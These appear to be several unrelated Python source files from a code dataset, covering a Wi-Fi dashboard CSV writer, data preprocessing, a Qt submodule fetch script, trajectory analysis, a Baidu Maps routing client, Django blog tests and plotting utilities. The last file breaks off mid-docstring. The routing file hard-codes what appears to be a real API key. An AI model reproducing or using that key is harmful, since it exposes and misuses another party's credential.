row_data.append(wlc_dict[\"per-phy\"])\n except KeyError: #append blank cell when no client data exists e.g. 
0 clients\n row_data.append(\"\")\n try:\n row_data.append(wlc_dict[\"top-os\"])\n except KeyError: #append blank cell when no client data exists e.g. 0 clients\n row_data.append(\"\")\n\n except KeyError:\n log.warning(f\"WLC data incomplete. Not writing to CSV\")\n else:\n write_csv(init.wlc_filename, row_data)\n\n\ndef send_to_csv_ap(ap_dict):\n\n dt = date_time()\n for ap_mac, ap_data in ap_dict.items():\n row_data = []\n row_data.append(dt[0])\n row_data.append(dt[1])\n try:\n row_data.append(ap_data[\"ap_name\"])\n row_data.append(ap_mac)\n row_data.append(ap_data[\"eth_mac\"])\n for slot in range(0, ap_data[\"slot-count\"]):\n slot = str(slot)\n row_data.append(f\"SLOT {slot}\")\n try:\n row_data.append(ap_data[slot][\"state\"])\n row_data.append(ap_data[slot][\"mode\"])\n row_data.append(ap_data[slot][\"band\"])\n row_data.append(ap_data[slot][\"channel\"])\n row_data.append(ap_data[slot][\"width\"])\n row_data.append(ap_data[slot][\"stations\"])\n row_data.append(ap_data[slot][\"ch_util\"])\n row_data.append(ap_data[slot][\"ch_changes\"])\n except KeyError:\n row_data = row_data + [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\n log.info(f\"No data for {ap_data['ap_name']} slot {slot}\") \n \n except KeyError:\n log.warning(f\"AP data incomplete. Not writing to CSV\")\n else:\n write_csv(init.ap_filename, row_data)\n\n\ninit = InitCsv()","repo_name":"Johnny8Bit/wifi-dashboard","sub_path":"libs/fileLib.py","file_name":"fileLib.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38597665841","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Data Challenge : Historical consumption regression for electricity supply pricing\n\n# # This module helps the pre-processing automation of our data set. 
It includes all the functions needed to deal\n# with missing values, adding features, normalisation and handling data type.\n\n# # # Importing\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n# local import\nfrom .util import need\n\n\n# See the other notebook for data preprocessing details and visualisation\n\n# In[2]:\n\nclass Data:\n    '''\n    The aim of this class is to help apply different preprocessing functions to our dataset.\n    We begin by cleaning our data set, removing useless features, then adding more features.\n    The last two methods split the data for the two locations.\n    '''\n\n    def __init__(self, data_train, data_test, y_data):\n        self.data_train = data_train\n        self.data_test = data_test\n        self.y_data = y_data\n\n    def data_preprocessing(self):\n        # Remove useless features\n        self.data_train = self.data_train.drop([\"loc_1\",\n                                                \"loc_2\",\n                                                \"loc_secondary_1\",\n                                                \"loc_secondary_2\",\n                                                \"loc_secondary_3\"],\n                                               axis=1)\n        self.data_test = self.data_test.drop([\"loc_1\",\n                                              \"loc_2\",\n                                              \"loc_secondary_1\",\n                                              \"loc_secondary_2\",\n                                              \"loc_secondary_3\"],\n                                             axis=1)\n        # add is holiday feature\n        need.is_holiday(self.data_train)\n        need.is_holiday(self.data_test)\n\n        # convert to timestamp\n        self.data_train.timestamp = pd.to_datetime(self.data_train.timestamp)\n        self.data_test.timestamp = pd.to_datetime(self.data_test.timestamp)\n\n        # indexing with timestamp\n        self.data_test = self.data_test.set_index('timestamp')\n        self.data_train = self.data_train.set_index('timestamp')\n\n        # add time features\n        need.time_features(self.data_train)\n        need.time_features(self.data_test)\n\n        # add is weekend feature\n        need.is_weekend(self.data_train)\n        need.is_weekend(self.data_test)\n\n        # add smoothing for temp and humidity\n        self.data_train['temp_1_smooth7D'] = self.data_train['temp_1'].interpolate().rolling(24 * 7).mean().fillna(\n            method='bfill').round(decimals=1)\n        self.data_train['temp_2_smooth7D'] = self.data_train['temp_2'].interpolate().rolling(24 * 7).mean().fillna(\n            method='bfill').round(decimals=1)\n        self.data_test['temp_1_smooth7D'] = self.data_test['temp_1'].interpolate().rolling(24 * 7).mean().fillna(\n            method='bfill').round(decimals=1)\n        self.data_test['temp_2_smooth7D'] = self.data_test['temp_2'].interpolate().rolling(24 * 7).mean().fillna(\n            method='bfill').round(decimals=1)\n\n        self.data_train['humidity_1_smooth7D'] = self.data_train['humidity_1'].interpolate().rolling(\n            24 * 7).mean().fillna(method='bfill').round()\n        self.data_train['humidity_2_smooth7D'] = self.data_train['humidity_2'].interpolate().rolling(\n            24 * 7).mean().fillna(method='bfill').round()\n        self.data_test['humidity_1_smooth7D'] = self.data_test['humidity_1'].interpolate().rolling(\n            24 * 7).mean().fillna(method='bfill').round()\n        self.data_test['humidity_2_smooth7D'] = self.data_test['humidity_2'].interpolate().rolling(\n            24 * 7).mean().fillna(method='bfill').round()\n\n        # Normalising data\n        scaler = MinMaxScaler()\n        self.data_train[['temp_1', 'temp_2',\n                         'mean_national_temp',\n                         'humidity_1', 'humidity_2',\n                         'consumption_secondary_1',\n                         'consumption_secondary_2',\n                         'consumption_secondary_3',\n                         'temp_1_smooth7D',\n                         'temp_2_smooth7D',\n                         'humidity_1_smooth7D',\n                         'humidity_2_smooth7D']] = scaler.fit_transform(self.data_train[['temp_1', 'temp_2',\n                                                                                         'mean_national_temp',\n                                                                                         'humidity_1', 'humidity_2',\n                                                                                         'consumption_secondary_1',\n                                                                                         'consumption_secondary_2',\n                                                                                         'consumption_secondary_3',\n                                                                                         'temp_1_smooth7D',\n                                                                                         'temp_2_smooth7D',\n                                                                                         'humidity_1_smooth7D',\n                                                                                         'humidity_2_smooth7D']])\n        self.data_train = 
self.data_train.interpolate()\n self.data_test[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']] = scaler.fit_transform(self.data_test[['temp_1', 'temp_2',\n 'mean_national_temp',\n 'humidity_1', 'humidity_2',\n 'consumption_secondary_1',\n 'consumption_secondary_2',\n 'consumption_secondary_3',\n 'temp_1_smooth7D',\n 'temp_2_smooth7D',\n 'humidity_1_smooth7D',\n 'humidity_2_smooth7D']])\n self.data_test = self.data_test.interpolate()\n\n def get_data_split(self):\n # split data train and test of the two sites\n x_train1 = self.data_train.drop(['temp_2',\n 'humidity_2',\n 'temp_2_smooth7D',\n 'humidity_2_smooth7D'],\n axis=1)\n\n x_train2 = self.data_train.drop(['temp_1',\n 'humidity_1',\n 'temp_1_smooth7D',\n 'humidity_1_smooth7D'],\n axis=1)\n\n x_test1 = self.data_test.drop(['temp_2',\n 'humidity_2',\n 'temp_2_smooth7D',\n 'humidity_2_smooth7D'], axis=1)\n\n x_test2 = self.data_test.drop(['temp_1',\n 'humidity_1',\n 'temp_1_smooth7D',\n 'humidity_1_smooth7D'], axis=1)\n\n return x_train1, x_train2, x_test1, x_test2\n\n def get_split_y_data(self):\n # split the data target of the two sites\n self.y_data = self.y_data.set_index(self.data_train.index)\n\n y_train1 = self.y_data['consumption_1']\n y_train2 = self.y_data['consumption_2']\n\n return y_train1, y_train2\n","repo_name":"aitsi/Time_series_project_on_historical_consumption_regression","sub_path":"Notebooks/model/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42485713882","text":"#!/usr/bin/env python\n\n\"\"\"Set up upstream remote in each submodule and fetch.\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport subprocess\nimport sys\n\n# Prevent .pyc file generation\nsys.dont_write_bytecode = True\n\nlogger = logging.getLogger(__name__)\nscript_dir = os.path.dirname(os.path.abspath(__file__))\n\ndef split_and_log(string, log_level=logging.DEBUG):\n for line in iter(string.splitlines()):\n line = line.rstrip()\n if line:\n logger.log(log_level, line)\n\ndef call(args, **kwargs):\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs)\n stdout, _ = p.communicate()\n split_and_log(stdout)\n return (0 == p.returncode)\n except (OSError, subprocess.CalledProcessError) as exception:\n logger.error('Subprocess failed. Exception: ' + str(exception))\n return False\n except:\n logger.error('Subprocess failed. 
Unknown exception.')\n return False\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\"--log-level\", type=str, default=\"INFO\", choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"], help=\"Desired console log level\")\n\n args = parser.parse_args(args)\n return args\n\ndef run(args):\n logging.basicConfig(level=args.log_level, format='%(levelname)-8s %(message)s')\n\n submodule_prefix = \"qt\"\n submodule_prefix_length = len(submodule_prefix)\n for file_name in os.listdir(script_dir):\n submodule_dir = os.path.join(script_dir, file_name)\n if os.path.isdir(submodule_dir):\n if file_name[:submodule_prefix_length] == submodule_prefix:\n if len(os.listdir(submodule_dir)) == 0:\n continue\n\n submodule = file_name\n\n # Ignore failure here if the upstream remote was already set\n call([\"git\", \"remote\", \"add\", \"upstream\", \"https://code.qt.io/qt/%s.git\" % submodule], cwd=submodule_dir)\n\n if not call([\"git\", \"fetch\", \"upstream\"], cwd=submodule_dir):\n logger.error(\"Could not fetch \\\"upstream\\\" for submodule \\\"%s\\\".\" % submodule)\n continue\n\n logger.info(\"Fetched upstream for submodule \\\"%s\\\".\" % submodule)\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(run(parse_args(sys.argv[1:])))\n","repo_name":"cycollins/tqtc-qt5","sub_path":"st_submodules_fetch.py","file_name":"st_submodules_fetch.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41068950062","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport models as m\n\n\ndef read_pos_sur(infolder):\n filenames = [f for f in os.listdir(\n infolder) if os.path.isfile(os.path.join(infolder, f))]\n files = [infolder + f for f in filenames]\n positions = []\n surfaces = []\n for file in files:\n try:\n with open(file, \"r\") as f:\n lines = f.readlines()\n pos = np.zeros(len(lines))\n sur = np.zeros(len(lines))\n for i in range(len(lines)):\n line = lines[i]\n arr = line.split(\",\")\n pos[i] = float(arr[0][:-1])\n sur[i] = int(arr[-1][:-1])\n positions.append(pos)\n surfaces.append(sur)\n except:\n print(\"Bad csv: \", file)\n\n return positions, surfaces\n\n\ndef plot_trajectories(ax, m, infolder):\n positions, surfaces = read_pos_sur(infolder)\n\n for i in range(len(positions)):\n pos = positions[i]\n sur = surfaces[i]\n energies = np.zeros(len(pos))\n for j in range(len(pos)):\n energies[j] = m.get_adiabatic_energy(pos[j])[int(sur[j])]\n\n ax.plot(pos, energies)\n\n\ndef avg_trajectories(ax, m, infolder):\n positions, surfaces = read_pos_sur(infolder)\n energies = []\n for i in range(len(positions)):\n pos = positions[i]\n sur = surfaces[i]\n en = np.zeros(len(pos))\n for j in range(len(pos)):\n en[j] = m.get_adiabatic_energy(pos[j])[int(sur[j])]\n energies.append(en)\n\n max_len = len(max(positions, key=lambda x: len(x)))\n for i in range(len(positions)):\n l = len(positions[i])\n if l < max_len:\n positions[i] = np.concatenate((\n positions[i], np.zeros(max_len - l) + positions[i][-1]))\n energies[i] = np.concatenate(\n (energies[i], np.zeros(max_len - l) + energies[i][-1]))\n\n p_avg = np.zeros(max_len)\n e_avg = np.zeros(max_len)\n for i in range(len(positions)):\n p_avg += positions[i]\n e_avg += energies[i]\n\n p_avg /= len(positions)\n e_avg /= len(positions)\n\n ax.plot(p_avg, e_avg)\n\n\ndef outfile_analysis(outfile):\n with open(outfile, \"r\") as f:\n end_states = []\n end_times = []\n for l in 
f.readlines():\n            if \"end state:\" in l.lower():\n                end_states.append(int(l.rstrip()[-1]))\n            elif \"end time:\" in l.lower():\n                end_times.append(int(l.split(\":\")[1].rstrip()))\n\n        print(\"Avg end state: \", sum(end_states)/len(end_states))\n        print(\"Avg end time: \", sum(end_times)/len(end_times))\n\n\ndef time_spent(infolder, x_split=0):\n    positions, surfaces = read_pos_sur(infolder)\n    left_count = 0\n    right_count = 0\n    state_counts = {}\n    for i in range(len(positions)):\n        pos = positions[i]\n        sur = surfaces[i]\n        l = len(pos)\n        left = sum(np.less(pos, np.zeros(l) + x_split))\n        right = l - left\n        left_count += left\n        right_count += right\n        for s in sur:\n            if s in state_counts.keys():\n                state_counts[s] += 1\n            else:\n                state_counts[s] = 1\n\n    tot = left_count + right_count\n    print(\"left: \", left_count/tot)\n    print(\"right: \", right_count/tot)\n\n    s_counts = np.array(list(state_counts.values()))\n    print(\"state counts: \", s_counts/sum(s_counts))\n\n\ndef traj():\n    fig, ax = plt.subplots()\n    ax.set_ylabel('Potential (Eh)')\n    ax.set_xlabel('Nuclear coordinate (a.u.)')\n    model = m.NState_Spin_Boson(l_states=10, r_states=10)\n    x = np.linspace(-20, 20, 1000)\n    m.plot_1d(ax, model, x)\n    # plot_trajectories(ax, model, \"results/Nstate_063021/verbose/\")\n    avg_trajectories(ax, model, \"results/Nstate_063021/verbose/\")\n    plt.show()\n\n\ndef tully_props(ax1, ax2, ax3, infolder, k_arr):\n    filenames = [f\"{k}.out\" for k in k_arr]\n    files = [infolder + f for f in filenames]\n\n    dat = {}\n\n    for i in range(len(files)):\n        filename = files[i]\n        k = k_arr[i]\n        state0_reflected = 0\n        state0_transmitted = 0\n        state1_transmitted = 0\n        with open(filename, \"r\") as f:\n            lines = f.readlines()\n            end_pos = None\n            end_state = None\n            for line in lines:\n                if \"end position:\" in line.lower():\n                    if end_pos is not None:\n                        if end_pos > 0 and end_state == 0:\n                            state0_transmitted += 1\n                        elif end_pos > 0 and end_state == 1:\n                            state1_transmitted += 1\n                        else:\n                            state0_reflected += 1\n\n                    end_pos = float(line.split(\"[\")[1].rstrip()[:-1])\n                elif \"end state:\" in line.lower():\n                    end_state = int(line.split(\":\")[1].rstrip()[-1])\n\n        # tally the final trajectory in the file, which the loop above never counts\n        if end_pos is not None:\n            if end_pos > 0 and end_state == 0:\n                state0_transmitted += 1\n            elif end_pos > 0 and end_state == 1:\n                state1_transmitted += 1\n            else:\n                state0_reflected += 1\n\n        tot = state0_reflected + state0_transmitted + state1_transmitted\n        state0_transmitted /= tot\n        state0_reflected /= tot\n        state1_transmitted /= tot\n\n        dat[k] = (state0_transmitted, state0_reflected, state1_transmitted)\n\n    s0_t = np.array([dat[k][0] for k in k_arr])\n    s0_r = np.array([dat[k][1] for k in k_arr])\n    s1_t = np.array([dat[k][2] for k in k_arr])\n\n    ax1.plot(k_arr, s0_t)\n    ax2.plot(k_arr, s0_r)\n    ax3.plot(k_arr, s1_t)\n\n\ndef filter_finished(d):\n    finished_trajs = []\n    filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n    for f in filenames:\n        i = int(f.split(\".\")[0])\n        finished_trajs.append(i)\n    for f in os.listdir(d + \"verbose/\"):\n        if int(f.split(\".\")[0]) not in finished_trajs:\n            os.remove(d + \"verbose/\" + f)\n\n\ndef plot_end_pos(outfile, m, ax):\n    with open(outfile, \"r\") as f:\n        end_pos = []\n        end_state = []\n        for l in f.readlines():\n            if \"end position:\" in l.lower():\n                end_pos.append(float(l.split(\"[\")[1].rstrip()[:-1]))\n            elif \"end state:\" in l.lower():\n                end_state.append(int(l.split(\":\")[1].rstrip()[-1]))\n\n    end_pos = np.array(end_pos)\n    end_state = np.array(end_state)\n\n    for i in range(len(end_pos)):\n        pos = end_pos[i]\n        sur = end_state[i]\n        energy = m.get_adiabatic_energy(pos)[sur]\n        ax.plot(pos, energy, 'ro')\n\n\ndef combine_tmp(d, outfile):\n    filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n    for filename in filenames:\n        
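# append each worker's .tmp fragment onto the combined output file\n        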
with open(d + outfile, \"a\") as out, open(d + filename) as infile:\n            out.writelines(infile.readlines())\n\n\ndef del_tmp(d):\n    filenames = [f for f in os.listdir(d) if f.endswith(\".tmp\")]\n    for filename in filenames:\n        os.remove(os.path.join(d, filename))\n\n\ndef prepare_unfinished_job(d, out):\n    filter_finished(d)\n    combine_tmp(d, out)\n    del_tmp(d)\n\n# prepare_unfinished_job(\n#     \"results/070821_Nstate_high_density/\", \"070821_high_d.out\")\n# outfile_analysis(\"results/Nstate_063021/063021.out\")\n# time_spent(\"./results/Nstate_063021/verbose/\")\n\n\nfig, ax = plt.subplots()\nax.set_xlabel(\"Nuclear coordinate (au)\")\nax.set_ylabel(\"Potential (Eh)\")\n# ax.set_title(\"iter=12500, damp=.0001, T=298\")\nx = np.linspace(-20, 20, 1000)\nmodel = m.NState_Spin_Boson(l_states=10, r_states=10)\nm.plot_diabats_1d(ax, model, x)\navg_trajectories(ax, model, \"results/070621_long_test/verbose/\")\n\nplot_end_pos(\"results/070621_long_test/070621.out\", model, ax)\nplt.show()\n","repo_name":"samrmay/afssh","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33411448060","text":"# -*- coding:utf-8 -*-\n\nimport requests\nimport sys\nfrom . import maps\napp_key = \"Nx80Sg2TOypzPcKRHz6P8TtE\"\n\n'''\nbaidu direction api doc: http://developer.baidu.com/map/index.php?title=webapi/direction-api\n'''\n\ndef GetRoutingByWalking(origin, destination, city):\n    params = {\n        'mode': 'walking', 'ak': app_key, 'output': 'json',\n        'origin': '%s,%s' % origin,\n        'destination': '%s,%s' % destination,\n        'region': city,\n    }\n    return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\ndef GetRoutingByDriving(origin, destination, city):\n    params = {\n        'mode': 'driving', 'ak': app_key, 'output': 'json',\n        'origin': '%s,%s' % origin,\n        'destination': '%s,%s' % destination,\n        'region': city,\n    }\n    return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\n    \ndef GetRoutingByTransit(origin, destination, city):\n    params = {\n        'mode': 'transit', 'ak': app_key, \n        'output': 'json', 'region': city,\n        'origin': '%s,%s' % origin, 'destination':'%s,%s' % destination,\n    } \n    return requests.get(\"http://api.map.baidu.com/direction/v1\", params = params).json()\n    \ndef GetRoutingByTaxi(origin, destination, city):\n    params = {\n        'mode': 'transit', 'ak': app_key, \n        'output': 'json', 'region': city,\n        'origin': '%s,%s' % origin, 'destination':'%s,%s' % destination,\n    } \n    resp = requests.get('http://api.map.baidu.com/direction/v1', params = params).json()\n    if resp['status'] == 0:\n        if resp['type'] == 1:\n            resp['status'] = 400001\n            resp['message'] = u'Ambiguous origin point; unable to query a route'\n        elif resp['type'] == 2:\n            resp['result'] = resp['result']['taxi']\n        del resp['type']\n    return resp\n    \nif __name__ == '__main__':\n    start = (30.270067,120.129649)  # Zhejiang University, Yuquan Campus\n    end = (30.295812,120.217858)  # Hangzhou East Railway Station\n    print(GetRoutingByTransit(start, end, u'杭州'))\n    #print(GetRoutingByWalking(start, end, u'杭州'))","repo_name":"groverc85/Mobile-Assistant","sub_path":"moblife/apis/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18722676213","text":"\"\"\"\nGiven a non-negative integer represented as a non-empty array of digits,\nplus one to the integer.\n\nYou may assume the integer does not contain any leading zero,\nexcept the 
number 0 itself.\n\nThe digits are stored such that the most significant digit is\nat the head of the list.\n\"\"\"\n\n\nclass Solution(object):\n\n    def plusOne(self, digits):\n        \"\"\"\n        :type digits: List[int]\n        :rtype: List[int]\n        \"\"\"\n        current = sum([digits[i] * 10 ** (len(digits) - i - 1)\n                       for i in range(len(digits))]) + 1\n        return [int(digit) for digit in str(current)]\n\n\ns = Solution()\ns.plusOne([1, 2, 3, 10900])\n","repo_name":"SamaelChen/machine-learning-practice-code","sub_path":"sp/leetcode/Plus_One.py","file_name":"Plus_One.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"68"} +{"seq_id":"27049057301","text":"import datetime\n\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom blog.models import Post, Comment, Category, Author\nfrom polls.models import Question, Choice\n\n# Functions to create objects for the tests\ndef create_post(category, author, name, content, status):\n    \"\"\"\n    Creates a post with the given `category, author, name, content, status`.\n    \"\"\"\n    return Post.objects.create(category=category, author=author, name=name, content=content, status=status)\n\ndef create_comment(post, author, content):\n    \"\"\"\n    Creates a comment with the given `post, author, content`.\n    \"\"\"\n    return Comment.objects.create(post=post, author=author, content=content)\n\ndef create_category(name):\n    \"\"\"\n    Creates a category with the given `name`.\n    \"\"\"\n    return Category.objects.create(name=name)\n\ndef create_author(name):\n    \"\"\"\n    Creates an author with the given `name`.\n    \"\"\"\n    return Author.objects.create(name=name)\n\ndef create_question(question_text, days):\n    \"\"\"\n    Creates a question with the given `question_text` and published the\n    given number of `days` offset to now (negative for questions published\n    in the past, positive for questions that have yet to be published).\n    \"\"\"\n    time = timezone.now() + datetime.timedelta(days=days)\n    return Question.objects.create(question_text=question_text, pub_date=time)\n\n#Sample tests\nclass HomeViewTests(TestCase):\n    def test_home_view_with_a_published_post(self):\n        \"\"\"\n        Posts with the Published status should be displayed on the\n        home page.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        create_post(category=category, author=author, name='Published Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.', status='Published')\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(reverse('blog.home'))\n        self.assertQuerysetEqual(\n            response.context['posts'],\n            ['<Post: Published Post>']\n        )\n\n    def test_home_view_with_a_draft_post(self):\n        \"\"\"\n        Posts with the Draft status should not be displayed on the\n        home page.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        create_post(category=category, author=author, name='Draft Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. 
Praesent sollicitudin.', status='Draft')\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(reverse('blog.home'))\n        self.assertContains(response, \"No posts are available.\")\n        self.assertQuerysetEqual(response.context['posts'], [])\n\n    def test_home_view_with_draft_post_and_published_post(self):\n        \"\"\"\n        Even if both draft and published posts exist, only published posts\n        should be displayed.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        create_post(category=category, author=author, name='Published Post',\n                    content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n                    status='Published')\n        create_post(category=category, author=author, name='Draft Post',\n                    content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n                    status='Draft')\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(reverse('blog.home'))\n        self.assertQuerysetEqual(\n            response.context['posts'],\n            ['<Post: Published Post>']\n        )\n\n    def test_home_view_with_two_published_posts(self):\n        \"\"\"\n        The blog home page may display multiple posts.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        create_post(category=category, author=author, name='Published Post 1',\n                    content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n                    status='Published')\n        create_post(category=category, author=author, name='Published Post 2',\n                    content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.',\n                    status='Published')\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(reverse('blog.home'))\n        self.assertQuerysetEqual(\n            response.context['posts'],\n            ['<Post: Published Post 1>', '<Post: Published Post 2>']\n        )\n\nclass ShowPostViewTests(TestCase):\n    def test_show_post_view_with_a_draft_post(self):\n        \"\"\"\n        The view of a post with a draft status should\n        return a 404 not found.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        draft_post = create_post(category=category, author=author, name='Draft Post', content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent sollicitudin.', status='Draft')\n        url = reverse('blog.post', args=(draft_post.id,))\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(url)\n        self.assertEqual(response.status_code, 404)\n\n    def test_show_post_view_with_a_published_post(self):\n        \"\"\"\n        The view of a post with a published status should\n        display the post content.\n        \"\"\"\n        category = create_category('Category 1')\n        author = create_author('Author 1')\n        published_post = create_post(category=category, author=author, name='Published Post',\n                                     content='Lorem ipsum dolor sit amet, consectetur adipiscing elit. 
Praesent sollicitudin.',\n                                     status='Published')\n        url = reverse('blog.post', args=(published_post.id,))\n        create_question(question_text=\"Past question.\", days=-30)\n        response = self.client.get(url)\n        self.assertContains(response, published_post.content)","repo_name":"alinecrsouza/django-blog-app","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"73173033176","text":"#!/usr/bin/env pypy3\n\ndef ans(A, B):\n\tret = 0\n\tpos_match = min(A[2], B[1])\n\tA[2] -= pos_match\n\tB[1] -= pos_match\n\tret += 2*pos_match\n\n\tassert(sum(A) == sum(B))\n\tN = sum(A)\n\n\tx = B[2]\n\ty = A[1]\n\n\tneg_match = (x + y) - N\n\tif neg_match > 0:\n\t\tret -= 2*neg_match\n\n\treturn ret\n\nT = int(input())\nfor t in range(T):\n\tA = input().split()\n\tA = list(map(int, A))\n\n\tB = input().split()\n\tB = list(map(int, B))\n\n\tprint(ans(A, B))","repo_name":"ldct/cp","sub_path":"codeforces/665/B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"23937230334","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 16 16:39:51 2022\n\n@author: njapke\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"latencies.csv\", index_col=\"Filters\")\n\nfig = plt.figure(figsize=(14,4))\nax = plt.axes(xlim=(1, 65534), ylim=(0, 6))\nax.grid(True)\n#ax.set_title('latency by filter (matched IP address)')\nax.set_title('latency by filter (no match)')\nax.set_xlabel('number of filters')\nax.set_ylabel('measured latency in ms')\n\nax.plot(np.array(df.index), np.array(df[\"Avg Latency\"]))\n\nfig.savefig(\"./latency.png\")\n\ndf_bnd = pd.read_csv(\"bandwidths.csv\", index_col=\"Filters\")\n\nfig = plt.figure(figsize=(14,4))\nax = plt.axes(xlim=(1, 65534), ylim=(0, 8))\nax.grid(True)\n#ax.set_title('bandwidth by filter (matched IP address)')\nax.set_title('bandwidth by filter (no match)')\nax.set_xlabel('number of filters')\nax.set_ylabel('measured bandwidth in Gbit/s')\n\nax.plot(np.array(df_bnd.index), np.array(df_bnd[\"Bitrate\"]))\n\nfig.savefig(\"./bandwidth.png\")\n\n","repo_name":"srnbckr/ebpf-network-emulation","sub_path":"baseline/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"73258430937","text":"\"\"\"\noctant.plotting - some plotting functions\n\nThe plotting module provides some specialized plotting\nfunctions often needed in ocean modelling.\n\nRequirements:\n=============\npylab, datetime, numpy, scipy\n\nFunctions:\n==========\n\nsticks - velocity vector stick plot along a time axis\ncmap_discretize - create a discrete colorbar from standard colormaps\n               which can be applied to e.g. 
pcolor\nztodepth - change negative z-ax ticklabels to positive depths\nlayers - a function for plotting vertical transects based on layer heights\njetWoGn - colormap similar to jet, but without Green\n\n\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport matplotlib.pyplot as plt\nfrom datetime import timedelta\nfrom functools import reduce\nimport numpy as np\n#from scipy import interpolate\nfrom pylab import interp\nfrom matplotlib.dates import date2num\nimport pylab as pl\n\ndef sticks(date,u,v,tnorm=0.1,figurewidth=8,pickind=1,color='blue'):\n    \"\"\"\n    sticks - create velocity stick plot\n\n    sticks(date, u, v, tnorm=0.1, color='blue' \\\n        figurewidth=8, pickind=1)\n\n    date - list/array of datetime elements\n    u - list/array of velocity in eastern direction\n    v - list/array of velocity in northern direction\n    tnorm - length of a u=max(u,v) as part of the time axis\n    color - color of sticks\n    figurewidth - width of the figure in inch\n    pickind - plot every \"pickind\"-vector\n    \"\"\"\n    onedt=(date[-1]-date[0])\n    onedt=timedelta(tnorm*onedt.days,tnorm*onedt.seconds)\n    daynorm=onedt.days+onedt.seconds/86400.0\n\n    u=np.asarray(u)\n    v=np.asarray(v)\n    norm=np.maximum(np.absolute(u).max(),np.absolute(v).max())\n\n    t=[]\n    f=[]\n    mask=[]\n    fac=pickind\n    for i in range(int(len(date)/fac)):\n        t.append(date2num(date[i*fac]))\n        f.append(0.0)\n        mask.append(False)\n        t.append(date2num(date[i*fac] \\\n            + timedelta(u[i*fac]/norm*onedt.days,u[i*fac]/norm*onedt.seconds)))\n        f.append(v[i*fac]/norm*daynorm)\n        mask.append(False)\n        t.append(date2num(date[i*fac]))\n        f.append(0.0)\n        mask.append(True)\n    \n    t=np.asarray(t)\n    f=np.asarray(f)\n    mask=np.asarray(mask)\n    f=np.ma.masked_array(f,mask=mask)\n    \n    plt.figure(figsize=(figurewidth,tnorm*figurewidth))\n    plt.plot_date(t,f,'-',color=color)\n    ax=plt.gca()\n    ax.set_aspect('equal')\n    ax.set_xlim(t[0],t[-1])\n    ax.set_ylim(-1.0*daynorm,1.0*daynorm)\n    ax.set_frame_on(False)\n    ax.yaxis.set_visible(False)\n\ndef cmap_discretize(cmap, N):\n    \"\"\"Return a discrete colormap from the continuous colormap cmap.\n    \n        cmap: colormap instance, eg. cm.jet. \n        N: Number of colors.\n    